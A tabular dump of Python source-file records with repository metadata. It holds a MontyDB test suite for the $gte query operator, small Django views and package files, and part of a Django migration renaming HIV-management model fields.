| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a5ed324dd7e9f4317c31b2655db0a7bec6aeeac8
| 14,035
|
py
|
Python
|
tests/test_engine/test_queries/test_queryop_comparsion_gte.py
|
gitter-badger/MontyDB
|
849d03dc2cfed35739481e9acb1ff0bd8095c91b
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_engine/test_queries/test_queryop_comparsion_gte.py
|
gitter-badger/MontyDB
|
849d03dc2cfed35739481e9acb1ff0bd8095c91b
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_engine/test_queries/test_queryop_comparsion_gte.py
|
gitter-badger/MontyDB
|
849d03dc2cfed35739481e9acb1ff0bd8095c91b
|
[
"BSD-3-Clause"
] | null | null | null |
import pytest
from montydb.errors import OperationFailure
from datetime import datetime
from bson.timestamp import Timestamp
from bson.objectid import ObjectId
from bson.min_key import MinKey
from bson.max_key import MaxKey
from bson.int64 import Int64
from bson.decimal128 import Decimal128
from bson.binary import Binary
from bson.regex import Regex
from bson.code import Code
from bson.py3compat import PY3
def test_qop_gte_1(monty_find, mongo_find):
docs = [
{"a": 0},
{"a": 1}
]
spec = {"a": {"$gte": 0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_2(monty_find, mongo_find):
docs = [
{"a": "x"},
{"a": "y"}
]
spec = {"a": {"$gte": "x"}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_3(monty_find, mongo_find):
docs = [
{"a": 10},
{"a": "10"}
]
spec = {"a": {"$gte": 10}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 1
assert monty_c.count() == mongo_c.count()
assert next(mongo_c) == next(monty_c)
def test_qop_gte_4(monty_find, mongo_find):
docs = [
{"a": True},
{"a": False}
]
spec = {"a": {"$gte": False}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_5(monty_find, mongo_find):
docs = [
{"a": 1},
{"a": False}
]
spec = {"a": {"$gte": False}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 1
assert monty_c.count() == mongo_c.count()
assert next(mongo_c) == next(monty_c)
def test_qop_gte_6(monty_find, mongo_find):
docs = [
{"a": [1, 2]},
{"a": [3, 4]}
]
spec = {"a": {"$gte": [2, 3]}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 1
assert monty_c.count() == mongo_c.count()
assert next(mongo_c) == next(monty_c)
def test_qop_gte_7(monty_find, mongo_find):
docs = [
{"a": {"b": 4}},
{"a": {"b": 6}}
]
spec = {"a": {"$gte": {"b": 5}}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 1
assert monty_c.count() == mongo_c.count()
assert next(mongo_c) == next(monty_c)
def test_qop_gte_8(monty_find, mongo_find):
docs = [
{"a": {"b": 4}},
{"a": {"e": 4}}
]
spec = {"a": {"$gte": {"c": 4}}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 1
assert monty_c.count() == mongo_c.count()
assert next(mongo_c) == next(monty_c)
def test_qop_gte_9(monty_find, mongo_find):
oid_0 = ObjectId(b"000000000000")
oid_1 = ObjectId(b"000000000001")
docs = [
{"a": oid_0},
{"a": oid_1}
]
spec = {"a": {"$gte": oid_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_10(monty_find, mongo_find):
dt_0 = datetime(1900, 1, 1)
dt_1 = datetime(1900, 1, 2)
docs = [
{"a": dt_0},
{"a": dt_1}
]
spec = {"a": {"$gte": dt_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_11(monty_find, mongo_find):
ts_0 = Timestamp(0, 1)
ts_1 = Timestamp(1, 1)
docs = [
{"a": ts_0},
{"a": ts_1}
]
spec = {"a": {"$gte": ts_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_12(monty_find, mongo_find):
min_k = MinKey()
max_k = MaxKey()
docs = [
{"a": min_k},
{"a": max_k}
]
spec = {"a": {"$gte": min_k}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_13(monty_find, mongo_find):
oid_0 = ObjectId(b"000000000000")
max_k = MaxKey()
min_k = MinKey()
docs = [
{"a": oid_0},
{"a": max_k},
{"a": min_k},
{"a": 55},
]
spec = {"a": {"$gte": max_k}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 4
assert monty_c.count() == mongo_c.count()
for i in range(4):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_14(monty_find, mongo_find):
ts_0 = Timestamp(0, 1)
dt_1 = datetime(1900, 1, 2)
docs = [
{"a": ts_0},
{"a": dt_1}
]
spec = {"a": {"$gte": ts_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 1
assert monty_c.count() == mongo_c.count()
assert next(mongo_c) == next(monty_c)
def test_qop_gte_15(monty_find, mongo_find):
docs = [
{"a": [1]},
{"a": 2}
]
spec = {"a": {"$gte": 1}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_16(monty_find, mongo_find):
docs = [
{"a": [2, 3]},
{"a": 2}
]
spec = {"a": {"$gte": 2}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_17(monty_find, mongo_find):
docs = [
{"a": [1, 3]},
{"a": 2}
]
spec = {"a": {"$gte": [1]}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 1
assert monty_c.count() == mongo_c.count()
assert next(mongo_c) == next(monty_c)
def test_qop_gte_18(monty_find, mongo_find):
docs = [
{"a": [1, 3]},
{"a": 2}
]
spec = {"a": {"$gte": [2]}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 0
assert monty_c.count() == mongo_c.count()
def test_qop_gte_19(monty_find, mongo_find):
docs = [
{"a": [None]},
{"a": 2}
]
spec = {"a": {"$gte": []}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 1
assert monty_c.count() == mongo_c.count()
assert next(mongo_c) == next(monty_c)
def test_qop_gte_20(monty_find, mongo_find):
long_ = Int64(10)
int_ = 10
float_ = 10.0
decimal_ = Decimal128("10.0")
docs = [
{"a": long_},
{"a": int_},
{"a": float_},
{"a": decimal_}
]
spec = {"a": {"$gte": 9.5}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 4
assert monty_c.count() == mongo_c.count()
for i in range(4):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_21(monty_find, mongo_find):
docs = [
{"a": Decimal128("1.1")},
{"a": Decimal128("NaN")},
{"a": Decimal128("-NaN")},
{"a": Decimal128("sNaN")},
{"a": Decimal128("-sNaN")},
{"a": Decimal128("Infinity")}
]
spec = {"a": {"$gte": Decimal128("0")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_22(monty_find, mongo_find):
bin_0 = Binary(b"0")
bin_1 = Binary(b"1")
byt_0 = b"0"
byt_1 = b"1"
docs = [
{"a": bin_0},
{"a": bin_1},
{"a": byt_0},
{"a": byt_1}
]
spec = {"a": {"$gte": bin_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 4 if PY3 else 2
assert monty_c.count() == mongo_c.count()
r = 4 if PY3 else 2
for i in range(r):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_23(monty_find, mongo_find):
bin_0 = Binary(b"0")
bin_1 = Binary(b"1")
byt_0 = b"0"
byt_1 = b"1"
docs = [
{"a": bin_0},
{"a": bin_1},
{"a": byt_0},
{"a": byt_1}
]
spec = {"a": {"$gte": byt_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 4 if PY3 else 2
assert monty_c.count() == mongo_c.count()
r = 4 if PY3 else 2
for i in range(r):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_24(monty_find, mongo_find):
code_0 = Code("0")
code_1 = Code("1")
docs = [
{"a": code_0},
{"a": code_1}
]
spec = {"a": {"$gte": code_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_25(monty_find, mongo_find):
code_0 = Code("0")
code_1 = Code("1")
code_1s = Code("1", {})
docs = [
{"a": code_1},
{"a": code_1s}
]
spec = {"a": {"$gte": code_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 1
assert monty_c.count() == mongo_c.count()
assert next(mongo_c) == next(monty_c)
def test_qop_gte_26(monty_find, mongo_find):
code_0s = Code("0", {})
code_1s = Code("1", {})
docs = [
{"a": code_0s},
{"a": code_1s}
]
spec = {"a": {"$gte": code_0s}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_27(monty_find, mongo_find):
code_1as = Code("1", {"a": 5})
code_1bs = Code("1", {"b": 5})
code_1cs = Code("1", {"c": 5})
docs = [
{"a": code_1as},
{"a": code_1bs},
{"a": code_1cs}
]
spec = {"a": {"$gte": code_1bs}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_28(monty_find, mongo_find):
regex_0 = Regex("^0")
regex_a = Regex("^a")
docs = [
{"a": regex_a},
]
spec = {"a": {"$gte": regex_0}}
monty_c = monty_find(docs, spec)
# Can't have RegEx as arg to predicate
with pytest.raises(OperationFailure):
next(monty_c)
def test_qop_gte_29(monty_find, mongo_find):
docs = [
{"a": Decimal128("1.1")},
{"a": Decimal128("NaN")},
{"a": Decimal128("-NaN")},
{"a": Decimal128("sNaN")},
{"a": Decimal128("-sNaN")},
{"a": Decimal128("Infinity")},
{"a": 0},
{"a": -10.0},
{"a": 10.0},
]
spec = {"a": {"$gte": Decimal128("NaN")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 4
assert monty_c.count() == mongo_c.count()
for i in range(4):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_30(monty_find, mongo_find):
docs = [
{"a": Decimal128("1.1")},
{"a": Decimal128("NaN")},
{"a": Decimal128("-NaN")},
{"a": Decimal128("sNaN")},
{"a": Decimal128("-sNaN")},
{"a": Decimal128("Infinity")},
{"a": 0},
{"a": -10.0},
{"a": 10.0},
]
spec = {"a": {"$gte": Decimal128("-NaN")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 4
assert monty_c.count() == mongo_c.count()
for i in range(4):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_31(monty_find, mongo_find):
docs = [
{"a": Decimal128("1.1")},
{"a": Decimal128("NaN")},
{"a": Decimal128("-NaN")},
{"a": Decimal128("sNaN")},
{"a": Decimal128("-sNaN")},
{"a": Decimal128("Infinity")},
{"a": 0},
{"a": -10.0},
{"a": 10.0},
]
spec = {"a": {"$gte": Decimal128("Infinity")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 1
assert monty_c.count() == mongo_c.count()
assert next(mongo_c) == next(monty_c)
def test_qop_gte_32(monty_find, mongo_find):
docs = [
{"a": Decimal128("1.1")},
{"a": Decimal128("NaN")},
{"a": Decimal128("-NaN")},
{"a": Decimal128("sNaN")},
{"a": Decimal128("-sNaN")},
{"a": Decimal128("Infinity")},
{"a": 0},
{"a": -10.0},
{"a": 10.0},
]
spec = {"a": {"$gte": 0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 4
assert monty_c.count() == mongo_c.count()
for i in range(4):
assert next(mongo_c) == next(monty_c)
| 23.627946
| 50
| 0.547203
| 2,079
| 14,035
| 3.440596
| 0.054834
| 0.103173
| 0.10569
| 0.058157
| 0.851531
| 0.838389
| 0.819097
| 0.793653
| 0.786943
| 0.752412
| 0
| 0.046184
| 0.27182
| 14,035
| 593
| 51
| 23.667791
| 0.653718
| 0.002565
| 0
| 0.67462
| 0
| 0
| 0.035081
| 0
| 0
| 0
| 0
| 0
| 0.199566
| 1
| 0.069414
| false
| 0
| 0.0282
| 0
| 0.097614
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a5f860217469d4fc9104734c6e9895f9869a0ddc
| 115
|
py
|
Python
|
credo_classification/views.py
|
credo-science/credo-classify
|
1cc5e00a4df36c4069c0d0fbc19f579780b79ca5
|
[
"MIT"
] | null | null | null |
credo_classification/views.py
|
credo-science/credo-classify
|
1cc5e00a4df36c4069c0d0fbc19f579780b79ca5
|
[
"MIT"
] | 8
|
2021-03-30T12:52:01.000Z
|
2022-03-12T00:19:45.000Z
|
credo_classification/views.py
|
credo-science/credo-classify
|
1cc5e00a4df36c4069c0d0fbc19f579780b79ca5
|
[
"MIT"
] | 1
|
2020-06-12T13:29:34.000Z
|
2020-06-12T13:29:34.000Z
|
from django.shortcuts import render
def home(request, *args, **kwargs):
return render(request, 'index.html')
| 19.166667
| 40
| 0.721739
| 15
| 115
| 5.533333
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.147826
| 115
| 5
| 41
| 23
| 0.846939
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
57099777f9106dd4c9a8e471c3cb19baa9d33dad
| 88
|
py
|
Python
|
routes/__init__.py
|
LeeLin2602/backend
|
c3968cf2c09f20823152daa271bf4d8baa58b408
|
[
"BSD-3-Clause"
] | 1
|
2022-02-16T09:11:26.000Z
|
2022-02-16T09:11:26.000Z
|
routes/__init__.py
|
LeeLin2602/backend
|
c3968cf2c09f20823152daa271bf4d8baa58b408
|
[
"BSD-3-Clause"
] | null | null | null |
routes/__init__.py
|
LeeLin2602/backend
|
c3968cf2c09f20823152daa271bf4d8baa58b408
|
[
"BSD-3-Clause"
] | null | null | null |
#-*- encoding: UTF-8 -*-
from .auth import *
from .domains import *
from .ddns import *
| 17.6
| 24
| 0.647727
| 12
| 88
| 4.75
| 0.666667
| 0.350877
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013889
| 0.181818
| 88
| 5
| 25
| 17.6
| 0.777778
| 0.261364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
57157fcb1e08596a39412ccec3714abb699f92cc
| 205
|
py
|
Python
|
tests/test_pysparkexplore.py
|
oarodriguez/pyspark-explore
|
7556e3b3f16a6c688d8caba33c284167c3796075
|
[
"Apache-2.0"
] | null | null | null |
tests/test_pysparkexplore.py
|
oarodriguez/pyspark-explore
|
7556e3b3f16a6c688d8caba33c284167c3796075
|
[
"Apache-2.0"
] | null | null | null |
tests/test_pysparkexplore.py
|
oarodriguez/pyspark-explore
|
7556e3b3f16a6c688d8caba33c284167c3796075
|
[
"Apache-2.0"
] | null | null | null |
"""Verify the library top-level functionality."""
import pysparkexplore
def test_version():
"""Verify we have updated the package version."""
assert pysparkexplore.__version__ == "2022.2.0.dev0"
| 25.625
| 56
| 0.726829
| 25
| 205
| 5.76
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04
| 0.146341
| 205
| 7
| 57
| 29.285714
| 0.782857
| 0.42439
| 0
| 0
| 0
| 0
| 0.121495
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
572eec43be1de4d0329666704982e8733374930d
| 28
|
py
|
Python
|
pyreactors/oscillations/__init__.py
|
michelemontuschi/pyreactors
|
1b1f7edccb2ca7f9b1281385dbc9017d3791510d
|
[
"MIT"
] | null | null | null |
pyreactors/oscillations/__init__.py
|
michelemontuschi/pyreactors
|
1b1f7edccb2ca7f9b1281385dbc9017d3791510d
|
[
"MIT"
] | null | null | null |
pyreactors/oscillations/__init__.py
|
michelemontuschi/pyreactors
|
1b1f7edccb2ca7f9b1281385dbc9017d3791510d
|
[
"MIT"
] | null | null | null |
from .oscillations import *
| 14
| 27
| 0.785714
| 3
| 28
| 7.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 28
| 1
| 28
| 28
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
93bdaf8746307f429fe7f45fdc899e3f90a17145
| 28
|
py
|
Python
|
sendotp/__init__.py
|
saadmk11/sendotp-python
|
b0cd5c3da969d00a753d9614c5bea0e2978859c9
|
[
"MIT"
] | 5
|
2017-05-15T07:21:29.000Z
|
2022-03-02T01:01:47.000Z
|
sendotp/__init__.py
|
saadmk11/sendotp-python
|
b0cd5c3da969d00a753d9614c5bea0e2978859c9
|
[
"MIT"
] | 2
|
2017-05-15T07:57:36.000Z
|
2021-09-23T06:22:34.000Z
|
sendotp/__init__.py
|
saadmk11/sendotp-python
|
b0cd5c3da969d00a753d9614c5bea0e2978859c9
|
[
"MIT"
] | 10
|
2017-05-29T06:53:42.000Z
|
2020-05-22T10:29:00.000Z
|
from sendotp import sendotp
| 14
| 27
| 0.857143
| 4
| 28
| 6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 28
| 1
| 28
| 28
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f519e020c408205c7e2e13f516f3f7b826e882ab
| 214
|
py
|
Python
|
server/security.py
|
s-bauer/yang-explorer
|
df2c946b66c3a303aa92435c286053a97b72176b
|
[
"Apache-2.0"
] | 437
|
2015-10-01T22:16:33.000Z
|
2022-03-29T08:21:28.000Z
|
server/security.py
|
s-bauer/yang-explorer
|
df2c946b66c3a303aa92435c286053a97b72176b
|
[
"Apache-2.0"
] | 114
|
2015-10-01T20:24:44.000Z
|
2022-03-19T10:21:49.000Z
|
server/security.py
|
s-bauer/yang-explorer
|
df2c946b66c3a303aa92435c286053a97b72176b
|
[
"Apache-2.0"
] | 196
|
2015-10-05T13:39:22.000Z
|
2022-03-18T02:50:24.000Z
|
import logging
from django.shortcuts import render_to_response
from django.template import RequestContext
def policy_handler(request):
return render_to_response('crossdomain.xml', {}, RequestContext(request))
| 30.571429
| 77
| 0.827103
| 26
| 214
| 6.615385
| 0.653846
| 0.116279
| 0.186047
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098131
| 214
| 6
| 78
| 35.666667
| 0.891192
| 0
| 0
| 0
| 0
| 0
| 0.070093
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.6
| 0.2
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
f54fbf148912f0c67520605e01d693eaf7e3e554
| 10,403
|
py
|
Python
|
cpovc_forms/migrations/0022_auto_20190712_1904.py
|
yashpatel12/CPIMS-api-newtest
|
d5129eb3aa034f70414a2471a72c0a74ad95f6ca
|
[
"Apache-2.0"
] | 3
|
2022-02-18T13:25:29.000Z
|
2022-02-25T11:49:11.000Z
|
cpovc_forms/migrations/0022_auto_20190712_1904.py
|
yashpatel12/CPIMS-api-newtest
|
d5129eb3aa034f70414a2471a72c0a74ad95f6ca
|
[
"Apache-2.0"
] | null | null | null |
cpovc_forms/migrations/0022_auto_20190712_1904.py
|
yashpatel12/CPIMS-api-newtest
|
d5129eb3aa034f70414a2471a72c0a74ad95f6ca
|
[
"Apache-2.0"
] | 22
|
2022-02-05T13:43:53.000Z
|
2022-02-26T14:29:06.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import datetime
class Migration(migrations.Migration):
dependencies = [
('cpovc_forms', '0021_auto_20190712_1506'),
]
operations = [
migrations.RenameField(
model_name='ovchivmanagement',
old_name='Adherence',
new_name='adherence',
),
migrations.RenameField(
model_name='ovchivmanagement',
old_name='Peer_Educator_Name',
new_name='baseline_hei',
),
migrations.RenameField(
model_name='ovchivmanagement',
old_name='FirstLine_Start_Date',
new_name='firstline_start_date',
),
migrations.RenameField(
model_name='ovchivmanagement',
old_name='Hiv_Confirmed_Date',
new_name='hiv_confirmed_date',
),
migrations.RenameField(
model_name='ovchivmanagement',
old_name='NHIF_Enrollment',
new_name='nhif_enrollment',
),
migrations.RenameField(
model_name='ovchivmanagement',
old_name='NHIF_Status',
new_name='switch_secondline_arv',
),
migrations.RenameField(
model_name='ovchivmanagement',
old_name='Support_group_Status',
new_name='switch_thirdline_arv',
),
migrations.RenameField(
model_name='ovchivmanagement',
old_name='Substitution_FirstLine_Date',
new_name='treatment_initiated_date',
),
migrations.RenameField(
model_name='ovchivmanagement',
old_name='Switch_SecondLine_Date',
new_name='viral_load_date',
),
migrations.RenameField(
model_name='ovchivmanagement',
old_name='Switch_ThirdLine_Date',
new_name='visit_date',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Adherence_Drugs_Duration',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Adherence_counselling',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='BMI',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Detectable_ViralLoad_Interventions',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Disclosure',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Duration_ART',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Height',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='MUAC',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='MUAC_Score',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='NextAppointment_Date',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Nutritional_Support',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Peer_Educator_Contact',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Referral_Services',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Switch_SecondLine_ARV',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Switch_ThirdLine_ARV',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Treament_Supporter_HIV',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Treatment_Supporter_Age',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Treatment_Supporter_Gender',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Treatment_Supporter_Relationship',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Treatment_initiated_Date',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Viral_Load_Date',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Viral_Load_Results',
),
migrations.RemoveField(
model_name='ovchivmanagement',
name='Visit_Date',
),
migrations.AddField(
model_name='ovchivmanagement',
name='adherence_counselling',
field=models.CharField(max_length=20, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='adherence_drugs_duration',
field=models.CharField(max_length=3, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='bmi',
field=models.CharField(max_length=20, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='detectable_viralload_interventions',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='disclosure',
field=models.CharField(max_length=20, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='duration_art',
field=models.CharField(max_length=3, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='height',
field=models.CharField(max_length=3, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='muac',
field=models.CharField(max_length=20, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='muac_score',
field=models.CharField(max_length=20, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='nextappointment_date',
field=models.DateField(null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='nhif_status',
field=models.CharField(max_length=11, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='nutritional_support',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='peer_educator_contact',
field=models.CharField(max_length=20, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='peer_educator_name',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='referral_services',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='substitution_firstline_date',
field=models.DateTimeField(default=datetime.datetime(2019, 7, 12, 19, 4, 23, 561430)),
),
migrations.AddField(
model_name='ovchivmanagement',
name='support_group_status',
field=models.CharField(max_length=11, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='switch_secondline_date',
field=models.DateTimeField(null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='switch_thirdline_date',
field=models.DateTimeField(null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
name='treament_supporter_hiv',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='ovchivmanagement',
